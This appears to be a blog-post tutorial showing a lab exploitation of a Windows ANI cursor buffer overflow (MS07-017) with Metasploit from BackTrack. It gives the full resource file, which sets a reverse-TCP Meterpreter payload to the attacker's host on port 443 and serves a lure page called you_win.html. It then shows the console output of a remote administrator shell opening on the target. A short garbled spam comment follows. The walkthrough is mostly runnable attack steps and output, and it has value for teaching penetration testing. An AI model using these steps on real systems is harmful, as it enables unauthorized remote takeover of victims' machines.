Local Host: 131.107.1.252/24 (TEST-BT4)
Target Host: 131.107.1.50/24 (LON-CL1)
Step 1: Create a resource file to be used by Metasploit in /tmp directory
root@bt:~# nano /tmp/exploit
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 131.107.1.252
set LHOST 131.107.1.252
set LPORT 443
set URIPATH /you_win.html
exploit
Press Ctrl-X to exit and save the file.
Step 2: Launch the exploit based on the resource file you have created earlier
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /tmp/exploit
[*] Exploit running as background job.
[*] Started reverse handler on 131.107.1.252:443
[*] Using URL: http://131.107.1.252:80/you_win.html
[*] Server started.
Step 3: Launch Internet Explorer on the remote machine and connect to http://131.107.1.252/you_win.html
Step 4: On our machine, check if you've got the connection from the target machine
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 131.107.1.50:1163...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 131.107.1.50:1163...
[*] Sending stage (748544 bytes) to 131.107.1.50
[*] Meterpreter session 1 opened (131.107.1.252:443 -> 131.107.1.50:1164) at Wed Sep 15 17:08:18 +0800 2010
Display all active sessions
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\Administrator @ LON-CL1 131.107.1.252:443 -> 131.107.1.50:1164
Interact with an active session
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
The men has developing the new software for the information of the peoples.That has been very beneficial for the student.
ReplyDeleteThanks.....
regards, saad from
Education